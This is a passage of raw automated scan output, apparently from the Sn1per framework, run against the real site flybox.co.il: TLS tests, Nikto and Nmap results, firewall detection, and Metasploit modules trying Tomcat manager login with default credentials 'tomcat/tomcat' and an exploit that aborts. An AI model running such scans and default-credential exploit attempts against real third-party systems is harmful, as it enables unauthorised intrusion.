  3222. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  3223. Safari 7 iOS 7.1 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  3224. Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3225. Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3226. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3227. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  3228. Java 6u45 No connection
  3229. Java 7u25 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  3230. Java 8u31 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3231. OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3232. OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3233.  
  3234.  Done 2017-12-31 05:28:17 [ 495s] -->> 104.31.74.239:443 (flybox.co.il) <<--
  3235.  
  3236. -----------------------------------------------------
  3237. Done testing now all IP addresses (on port 443): 104.31.75.239 104.31.74.239
  3238.  
  3239.  
  3240. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ 
  3241. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
  3242. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
  3243. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
  3244. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 
  3245. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ 
  3246. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ 
  3247. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  3248. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  3249. ░ ░ 
  3250. + -- --=[MÄŚŚBĻËËĐ V20160303 BÅž 1Ņ3 @ ĊŖÖŎĐŚȞÏËĻĐ - https://crowdshield.com
  3251. + -- --=[Scan Complete!
  3252.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  3253. + -- --=[Checking if X-Content options are enabled on flybox.co.il... 
  3254.  
  3255. + -- --=[Checking if X-Frame options are enabled on flybox.co.il... 
  3256.  
  3257. + -- --=[Checking if X-XSS-Protection header is enabled on flybox.co.il... 
  3258.  
  3259. + -- --=[Checking HTTP methods on flybox.co.il... 
  3260.  
  3261. + -- --=[Checking if TRACE method is enabled on flybox.co.il... 
  3262.  
  3263. + -- --=[Checking for META tags on flybox.co.il... 
  3264.  
  3265. + -- --=[Checking for open proxy on flybox.co.il... 
  3266.  
  3267. + -- --=[Enumerating software on flybox.co.il... 
  3268. x-powered-by: PHP/7.0.13
  3269. set-cookie: PHPSESSID=g357t8tsdioj6o4cv8kvsij2f4; expires=Thu, 14-Sep-2023 18:24:10 GMT; Max-Age=180000000; path=/
  3270. server: cloudflare
  3271.  
  3272. + -- --=[Checking if Strict-Transport-Security is enabled on flybox.co.il... 
  3273.  
  3274. + -- --=[Checking for Flash cross-domain policy on flybox.co.il... 
  3275.  
  3276. + -- --=[Checking for Silverlight cross-domain policy on flybox.co.il... 
  3277.  
  3278. + -- --=[Checking for HTML5 cross-origin resource sharing on flybox.co.il... 
  3279.  
  3280. + -- --=[Retrieving robots.txt on flybox.co.il... 
  3281. User-agent: *
  3282. Disallow: /wp-admin/
  3283. Allow: /wp-admin/admin-ajax.php
  3284.  
  3285. + -- --=[Retrieving sitemap.xml on flybox.co.il... 
  3286.  
  3287. + -- --=[Checking cookie attributes on flybox.co.il... 
  3288. set-cookie: __cfduid=d3aaf1e2b31c05c61168ba247f638c7a61514716107; expires=Mon, 31-Dec-18 10:28:27 GMT; path=/; domain=.flybox.co.il; HttpOnly
  3289. set-cookie: PHPSESSID=sbq77vcrt38t8vklj1ld90liu3; expires=Thu, 14-Sep-2023 18:24:15 GMT; Max-Age=180000000; path=/
  3290. set-cookie: qtrans_front_language=he; expires=Mon, 31-Dec-2018 10:24:15 GMT; Max-Age=31536000; path=/
  3291.  
  3292. + -- --=[Checking for ASP.NET Detailed Errors on flybox.co.il... 
  3293. jQuery("input#footernewsletter").removeClass("error")
  3294. jQuery("input#footernewsletter").addClass("error")
  3295. if( returned_data.result == 'error' ) {
  3296. <body class="rtl error404">
  3297.  
  3298. 
  3299.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  3300. - Nikto v2.1.6
  3301. ---------------------------------------------------------------------------
  3302. + Target IP: 104.31.75.239
  3303. + Target Hostname: flybox.co.il
  3304. + Target Port: 443
  3305. ---------------------------------------------------------------------------
  3306. + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni165065.cloudflaressl.com
  3307. Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
  3308. Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
  3309. + Start Time: 2017-12-31 05:28:31 (GMT-5)
  3310. ---------------------------------------------------------------------------
  3311. + Server: cloudflare
  3312. + Cookie __cfduid created without the secure flag
  3313. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  3314. + Uncommon header 'cf-ray' found, with contents: 3d5c8d721bb70eeb-EWR
  3315. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  3316. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  3317. + All CGI directories 'found', use '-C none' to test none
  3318. + Hostname 'flybox.co.il' does not match certificate's names: sni165065.cloudflaressl.com
  3319. + Scan terminated: 20 error(s) and 6 item(s) reported on remote host
  3320. + End Time: 2017-12-31 05:29:19 (GMT-5) (48 seconds)
  3321. ---------------------------------------------------------------------------
  3322. + 1 host(s) tested
  3323.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  3324. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/flybox.co.il-port443.jpg
  3325.  + -- --=[Port 445 closed... skipping.
  3326.  + -- --=[Port 512 closed... skipping.
  3327.  + -- --=[Port 513 closed... skipping.
  3328.  + -- --=[Port 514 closed... skipping.
  3329.  + -- --=[Port 623 closed... skipping.
  3330.  + -- --=[Port 624 closed... skipping.
  3331.  + -- --=[Port 1099 closed... skipping.
  3332.  + -- --=[Port 1433 closed... skipping.
  3333.  + -- --=[Port 2049 closed... skipping.
  3334.  + -- --=[Port 2121 closed... skipping.
  3335.  + -- --=[Port 3306 closed... skipping.
  3336.  + -- --=[Port 3310 closed... skipping.
  3337.  + -- --=[Port 3128 closed... skipping.
  3338.  + -- --=[Port 3389 closed... skipping.
  3339.  + -- --=[Port 3632 closed... skipping.
  3340.  + -- --=[Port 4443 closed... skipping.
  3341.  + -- --=[Port 5432 closed... skipping.
  3342.  + -- --=[Port 5800 closed... skipping.
  3343.  + -- --=[Port 5900 closed... skipping.
  3344.  + -- --=[Port 5984 closed... skipping.
  3345.  + -- --=[Port 6000 closed... skipping.
  3346.  + -- --=[Port 6667 closed... skipping.
  3347.  + -- --=[Port 8000 closed... skipping.
  3348.  + -- --=[Port 8100 closed... skipping.
  3349.  + -- --=[Port 8080 opened... running tests...
  3350.  
  3351. ^ ^
  3352. _ __ _ ____ _ __ _ _ ____
  3353. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  3354. | V V // o // _/ | V V // 0 // 0 // _/
  3355. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  3356. <
  3357. ...'
  3358.  
  3359. WAFW00F - Web Application Firewall Detection Tool
  3360.  
  3361. By Sandro Gauci && Wendel G. Henrique
  3362.  
  3363. Checking http://flybox.co.il:8080
  3364. The site http://flybox.co.il:8080 is behind a CloudFlare
  3365. Number of requests: 1
  3366.  
  3367. http://flybox.co.il:8080 [523 Unassigned] CloudFlare, Cookies[__cfduid,cf_ob_info,cf_use_ob], Country[UNITED STATES][US], HTML5, HTTPServer[cloudflare], HttpOnly[__cfduid], IP[104.31.75.239], JQuery, Script[text/javascript], Title[flybox.co.il | 523: Origin is unreachable], UncommonHeaders[cf-ray], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=Edge]
  3368.  
  3369.  
  3370.  __ ______ _____ 
  3371.  \ \/ / ___|_ _|
  3372.  \ /\___ \ | | 
  3373.  / \ ___) || | 
  3374.  /_/\_|____/ |_| 
  3375.  
  3376. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  3377. + -- --=[Target: flybox.co.il:8080
  3378. + -- --=[Site not vulnerable to Cross-Site Tracing!
  3379. + -- --=[Site not vulnerable to Host Header Injection!
  3380. + -- --=[Site not vulnerable to Cross-Frame Scripting!
  3381. + -- --=[Site not vulnerable to Clickjacking!
  3382.  
  3383. HTTP/1.1 405 Not Allowed
  3384. Date: Sun, 31 Dec 2017 10:29:55 GMT
  3385. Content-Type: text/html
  3386. Content-Length: 177
  3387. Connection: close
  3388. Server: cloudflare-nginx
  3389. CF-RAY: -
  3390.  
  3391. <html>
  3392. <head><title>405 Not Allowed</title></head>
  3393. <body bgcolor="white">
  3394. <center><h1>405 Not Allowed</h1></center>
  3395. <hr><center>cloudflare-nginx</center>
  3396. </body>
  3397. </html>
  3398. 
  3399. HTTP/1.1 523 Origin Unreachable
  3400. Date: Sun, 31 Dec 2017 10:29:56 GMT
  3401. Content-Type: text/html; charset=UTF-8
  3402. Transfer-Encoding: chunked
  3403. Connection: keep-alive
  3404. Set-Cookie: __cfduid=d23ab0e266a46bb002f6d1ad600a8e45e1514716196; expires=Mon, 31-Dec-18 10:29:56 GMT; path=/; domain=.flybox.co.il; HttpOnly
  3405. Expires: Thu, 01 Jan 1970 00:00:01 GMT
  3406. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  3407. Pragma: no-cache
  3408. X-Frame-Options: SAMEORIGIN
  3409. Set-Cookie: cf_use_ob=8080; expires=Sun, 31-Dec-17 10:30:26 GMT; path=/
  3410. Set-Cookie: cf_ob_info=523:3d5c8f82b55969a6:CDG; expires=Sun, 31-Dec-17 10:30:26 GMT; path=/
  3411. Server: cloudflare
  3412. CF-RAY: 3d5c8f82b55969a6-CDG
  3413.  
  3414. 1614
  3415. <!DOCTYPE html>
  3416. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  3417. <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  3418. <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  3419. <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
  3420. <head>
  3421. <meta 
  3422.  
  3423.  
  3424. Version: 1.11.10-static
  3425. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  3426. 
  3427. Testing SSL server flybox.co.il on port 8080 using SNI name flybox.co.il
  3428.  
  3429. TLS Fallback SCSV:
  3430. Server does not support TLS Fallback SCSV
  3431.  
  3432. TLS renegotiation:
  3433. Session renegotiation not supported
  3434.  
  3435. TLS Compression:
  3436. Compression disabled
  3437.  
  3438. Heartbleed:
  3439. TLS 1.2 not vulnerable to heartbleed
  3440. TLS 1.1 not vulnerable to heartbleed
  3441. TLS 1.0 not vulnerable to heartbleed
  3442.  
  3443. Supported Server Cipher(s):
  3444. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ 
  3445. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
  3446. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
  3447. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
  3448. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 
  3449. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ 
  3450. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ 
  3451. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  3452. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  3453. ░ ░ 
  3454. + -- --=[MÄŚŚBĻËËĐ V20160303 BÅž 1Ņ3 @ ĊŖÖŎĐŚȞÏËĻĐ - https://crowdshield.com
  3455. + -- --=[Scan Complete!
  3456. - Nikto v2.1.6
  3457. ---------------------------------------------------------------------------
  3458. + Target IP: 104.31.75.239
  3459. + Target Hostname: flybox.co.il
  3460. + Target Port: 8080
  3461. + Start Time: 2017-12-31 05:29:58 (GMT-5)
  3462. ---------------------------------------------------------------------------
  3463. + Server: cloudflare
  3464. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  3465. + Uncommon header 'cf-ray' found, with contents: 3d5c8f9133b91043-CDG
  3466. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  3467. + All CGI directories 'found', use '-C none' to test none
  3468. + Server banner has changed from 'cloudflare' to 'cloudflare-nginx' which may suggest a WAF, load balancer or proxy is in place
  3469. + Scan terminated: 17 error(s) and 3 item(s) reported on remote host
  3470. + End Time: 2017-12-31 07:29:00 (GMT-5) (7142 seconds)
  3471. ---------------------------------------------------------------------------
  3472. + 1 host(s) tested
  3473.  
  3474. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 07:29 EST
  3475. Nmap scan report for flybox.co.il (104.31.75.239)
  3476. Host is up (2.8s latency).
  3477. Other addresses for flybox.co.il (not scanned): 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef 104.31.74.239
  3478.  
  3479. PORT STATE SERVICE VERSION
  3480. 8080/tcp filtered http-proxy
  3481. Too many fingerprints match this host to give specific OS details
  3482. Network Distance: 9 hops
  3483.  
  3484. TRACEROUTE (using proto 1/icmp)
  3485. HOP RTT ADDRESS
  3486. 1 2780.34 ms 10.13.0.1
  3487. 2 2794.33 ms 37.187.24.253
  3488. 3 2787.36 ms 10.50.225.60
  3489. 4 2790.85 ms 10.17.129.42
  3490. 5 2783.87 ms 10.73.0.54
  3491. 6 ...
  3492. 7 2801.39 ms be100-1110.th2-1-a9.fr.eu (213.186.32.215)
  3493. 8 ...
  3494. 9 2799.89 ms 104.31.75.239
  3495.  
  3496. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  3497. Nmap done: 1 IP address (1 host up) scanned in 21.58 seconds
  3498. 
  3499. Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
  3500. EFLAGS: 00010046
  3501. eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
  3502. esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
  3503. ds: 0018 es: 0018 ss: 0018
  3504. Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
  3505.  
  3506. 
  3507. Stack: 90909090990909090990909090
  3508. 90909090990909090990909090
  3509. 90909090.90909090.90909090
  3510. 90909090.90909090.90909090
  3511. 90909090.90909090.09090900
  3512. 90909090.90909090.09090900
  3513. ..........................
  3514. cccccccccccccccccccccccccc
  3515. cccccccccccccccccccccccccc
  3516. ccccccccc.................
  3517. cccccccccccccccccccccccccc
  3518. cccccccccccccccccccccccccc
  3519. .................ccccccccc
  3520. cccccccccccccccccccccccccc
  3521. cccccccccccccccccccccccccc
  3522. ..........................
  3523. ffffffffffffffffffffffffff
  3524. ffffffff..................
  3525. ffffffffffffffffffffffffff
  3526. ffffffff..................
  3527. ffffffff..................
  3528. ffffffff..................
  3529. 
  3530.  
  3531. Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
  3532. Aiee, Killing Interrupt handler
  3533. Kernel panic: Attempted to kill the idle task!
  3534. In swapper task - not syncing
  3535. 
  3536.  
  3537. =[ metasploit v4.16.26-dev ]
  3538. + -- --=[ 1714 exploits - 975 auxiliary - 300 post ]
  3539. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
  3540. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  3541.  
  3542. RHOST => flybox.co.il
  3543. [-] WAR file not found
  3544. [*] Auxiliary module execution completed
  3545. RHOSTS => flybox.co.il
  3546. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  3547. RHOST => flybox.co.il
  3548. RPORT => 8080
  3549. [*] Scanned 1 of 4 hosts (25% complete)
  3550. [*] Scanned 2 of 4 hosts (50% complete)
  3551. [*] Scanned 3 of 4 hosts (75% complete)
  3552. [*] Scanned 4 of 4 hosts (100% complete)
  3553. [*] Auxiliary module execution completed
  3554. [*] Attempting to connect to 2400:cb00:2048:1::681f:4aef:8080
  3555. [+] No File(s) found
  3556. [*] Scanned 1 of 4 hosts (25% complete)
  3557. [*] Attempting to connect to 2400:cb00:2048:1::681f:4bef:8080
  3558. [+] No File(s) found
  3559. [*] Scanned 2 of 4 hosts (50% complete)
  3560. [*] Attempting to connect to 104.31.75.239:8080
  3561. [+] No File(s) found
  3562. [*] Scanned 3 of 4 hosts (75% complete)
  3563. [*] Attempting to connect to 104.31.74.239:8080
  3564. [+] No File(s) found
  3565. [*] Scanned 4 of 4 hosts (100% complete)
  3566. [*] Auxiliary module execution completed
  3567. [*] http://[2400:cb00:2048:1::681f:4aef]:8080/admin/j_security_check - Checking j_security_check...
  3568. [*] http://[2400:cb00:2048:1::681f:4aef]:8080/admin/j_security_check - Server returned: 403
  3569. [-] http://[2400:cb00:2048:1::681f:4aef]:8080/admin/j_security_check - Unable to enumerate users with this URI
  3570. [*] Scanned 1 of 4 hosts (25% complete)
  3571. [*] http://[2400:cb00:2048:1::681f:4bef]:8080/admin/j_security_check - Checking j_security_check...
  3572. [*] http://[2400:cb00:2048:1::681f:4bef]:8080/admin/j_security_check - Server returned: 403
  3573. [-] http://[2400:cb00:2048:1::681f:4bef]:8080/admin/j_security_check - Unable to enumerate users with this URI
  3574. [*] Scanned 2 of 4 hosts (50% complete)
  3575. [*] http://104.31.75.239:8080/admin/j_security_check - Checking j_security_check...
  3576. [*] Scanned 3 of 4 hosts (75% complete)
  3577. [*] http://104.31.74.239:8080/admin/j_security_check - Checking j_security_check...
  3578. [-] http://104.31.74.239:8080/admin/j_security_check - Unable to enumerate users with this URI
  3579. [*] Scanned 4 of 4 hosts (100% complete)
  3580. [*] Auxiliary module execution completed
  3581. [-] http://2400:cb00:2048:1::681f:4aef:8080 - Authorization not requested
  3582. [*] Scanned 1 of 4 hosts (25% complete)
  3583. [-] http://2400:cb00:2048:1::681f:4bef:8080 - Authorization not requested
  3584. [*] Scanned 2 of 4 hosts (50% complete)
  3585. [-] http://104.31.75.239:8080/manager/html - No response
  3586. [*] Scanned 3 of 4 hosts (75% complete)
  3587. [-] http://104.31.74.239:8080/manager/html - No response
  3588. [*] Scanned 4 of 4 hosts (100% complete)
  3589. [*] Auxiliary module execution completed
  3590. [-] Exploit aborted due to failure: not-found: The target server fingerprint "cloudflare-nginx ( 403-Forbidden )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  3591. [*] Exploit completed, but no session was created.
  3592. USERNAME => tomcat
  3593. PASSWORD => tomcat
  3594. [-] Exploit aborted due to failure: not-found: The target server fingerprint "cloudflare-nginx ( 403-Forbidden )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  3595. [*] Exploit completed, but no session was created.
  3596.  + -- --=[Port 8180 closed... skipping.
  3597.  + -- --=[Port 8443 opened... running tests...
  3598.  
  3599. ^ ^
  3600. _ __ _ ____ _ __ _ _ ____
  3601. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  3602. | V V // o // _/ | V V // 0 // 0 // _/
  3603. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  3604. <
  3605. ...'
  3606.  
  3607. WAFW00F - Web Application Firewall Detection Tool
  3608.  
  3609. By Sandro Gauci && Wendel G. Henrique
  3610.  
  3611. Checking http://flybox.co.il:8443
  3612. The site http://flybox.co.il:8443 is behind a CloudFlare
  3613. Number of requests: 1
  3614.  
  3615. http://flybox.co.il:8443 [400 Bad Request] CloudFlare, Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], IP[104.31.74.239], Title[400 The plain HTTP request was sent to HTTPS port], UncommonHeaders[cf-ray]
  3616.  
  3617.  
  3618.  __ ______ _____ 
  3619.  \ \/ / ___|_ _|
  3620.  \ /\___ \ | | 
  3621.  / \ ___) || | 
  3622.  /_/\_|____/ |_| 
  3623.  
  3624. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  3625. + -- --=[Target: flybox.co.il:8443
  3626. Version: 1.11.10-static
  3627. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  3628. 
  3629. Testing SSL server flybox.co.il on port 8443 using SNI name flybox.co.il
  3630.  
  3631. TLS Fallback SCSV:
  3632. Server does not support TLS Fallback SCSV
  3633.  
  3634. TLS renegotiation:
  3635. Secure session renegotiation supported
  3636.  
  3637. TLS Compression:
  3638. Compression disabled
  3639.  
  3640. Heartbleed:
  3641. TLS 1.2 not vulnerable to heartbleed
  3642. TLS 1.1 not vulnerable to heartbleed
  3643. TLS 1.0 not vulnerable to heartbleed
  3644.  
  3645. Supported Server Cipher(s):
  3646. Preferred TLSv1.2 256 bits ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
  3647. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  3648. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
  3649. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
  3650. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  3651. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
  3652. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
  3653. Preferred TLSv1.1 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
  3654. Accepted TLSv1.1 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
  3655. Preferred TLSv1.0 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
  3656. Accepted TLSv1.0 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
  3657.  
  3658. SSL Certificate:
  3659. Signature Algorithm: ecdsa-with-SHA256
  3660. Subject: sni165065.cloudflaressl.com
  3661. Altnames: DNS:sni165065.cloudflaressl.com, DNS:*.aonlineorder.tk, DNS:*.bestproductthisyear.tk, DNS:*.bigsale135store.tk, DNS:*.bigsale171store.tk, DNS:*.bigsale215store.tk, DNS:*.bigsale248store.tk, DNS:*.bigsale281store.tk, DNS:*.bjfhiu.tk, DNS:*.bsmartbuyer.tk, DNS:*.bsmartonlineshop.tk, DNS:*.btokoonlinemurah.tk, DNS:*.budgettrouwfilm.nl, DNS:*.dbranded.tk, DNS:*.eawesomemarket.tk, DNS:*.emmom.tk, DNS:*.flybox.co.il, DNS:*.fmarketplus.tk, DNS:*.ftopbuy.tk, DNS:*.h1xv9oacp.ga, DNS:*.ialliexpress.tk, DNS:*.iowist.com, DNS:*.ipaytoko.tk, DNS:*.iperfectmarket.tk, DNS:*.ismartxpress.tk, DNS:*.jsmartonlineshop.tk, DNS:*.jtopcharts.tk, DNS:*.lalliexpress.tk, DNS:*.lpayperclick.tk, DNS:*.lpremiumonlineshop.tk, DNS:*.onlinekanyakumari.com, DNS:*.osmartbuyer.tk, DNS:*.pawesomemarket.tk, DNS:*.pbelimudah.tk, DNS:*.rlinkaliexpress.tk, DNS:*.rnesaliexpress.tk, DNS:*.samriddle.website, DNS:*.snapcracka.us, DNS:*.stokoonlinemurah.tk, DNS:*.taeaj.tk, DNS:*.techxpertsllc.com, DNS:*.vbrs.co.uk, DNS:*.wholesaleonline114.tk, DNS:*.wholesaleonline4.tk, DNS:*.wholesaleonline55.tk, DNS:*.wittcatt.stream, DNS:aonlineorder.tk, DNS:bestproductthisyear.tk, DNS:bigsale135store.tk, DNS:bigsale171store.tk, DNS:bigsale215store.tk, DNS:bigsale248store.tk, DNS:bigsale281store.tk, DNS:bjfhiu.tk, DNS:bsmartbuyer.tk, DNS:bsmartonlineshop.tk, DNS:btokoonlinemurah.tk, DNS:budgettrouwfilm.nl, DNS:dbranded.tk, DNS:eawesomemarket.tk, DNS:emmom.tk, DNS:flybox.co.il, DNS:fmarketplus.tk, DNS:ftopbuy.tk, DNS:h1xv9oacp.ga, DNS:ialliexpress.tk, DNS:iowist.com, DNS:ipaytoko.tk, DNS:iperfectmarket.tk, DNS:ismartxpress.tk, DNS:jsmartonlineshop.tk, DNS:jtopcharts.tk, DNS:lalliexpress.tk, DNS:lpayperclick.tk, DNS:lpremiumonlineshop.tk, DNS:onlinekanyakumari.com, DNS:osmartbuyer.tk, DNS:pawesomemarket.tk, DNS:pbelimudah.tk, DNS:rlinkaliexpress.tk, DNS:rnesaliexpress.tk, DNS:samriddle.website, DNS:snapcracka.us, DNS:stokoonlinemurah.tk, DNS:taeaj.tk, DNS:techxpertsllc.com, DNS:vbrs.co.uk, DNS:wholesaleonline114.tk, DNS:wholesaleonline4.tk, DNS:wholesaleonline55.tk, DNS:wittcatt.stream
  3662. Issuer: COMODO ECC Domain Validation Secure Server CA 2
  3663.  
  3664. Not valid before: Dec 17 00:00:00 2017 GMT
  3665. Not valid after: Jun 25 23:59:59 2018 GMT
  3666. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ 
  3667. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
  3668. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
  3669. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
  3670. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 
  3671. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ 
  3672. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ 
  3673. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  3674. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  3675. ░ ░ 
  3676. + -- --=[MÄŚŚBĻËËĐ V20160303 BÅž 1Ņ3 @ ĊŖÖŎĐŚȞÏËĻĐ - https://crowdshield.com
  3677. + -- --=[Scan Complete!
  3678. - Nikto v2.1.6
  3679. ---------------------------------------------------------------------------
  3680. + Target IP: 104.31.75.239
  3681. + Target Hostname: flybox.co.il
  3682. + Target Port: 8443
  3683. ---------------------------------------------------------------------------
  3684. + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni165065.cloudflaressl.com
  3685. Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
  3686. Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
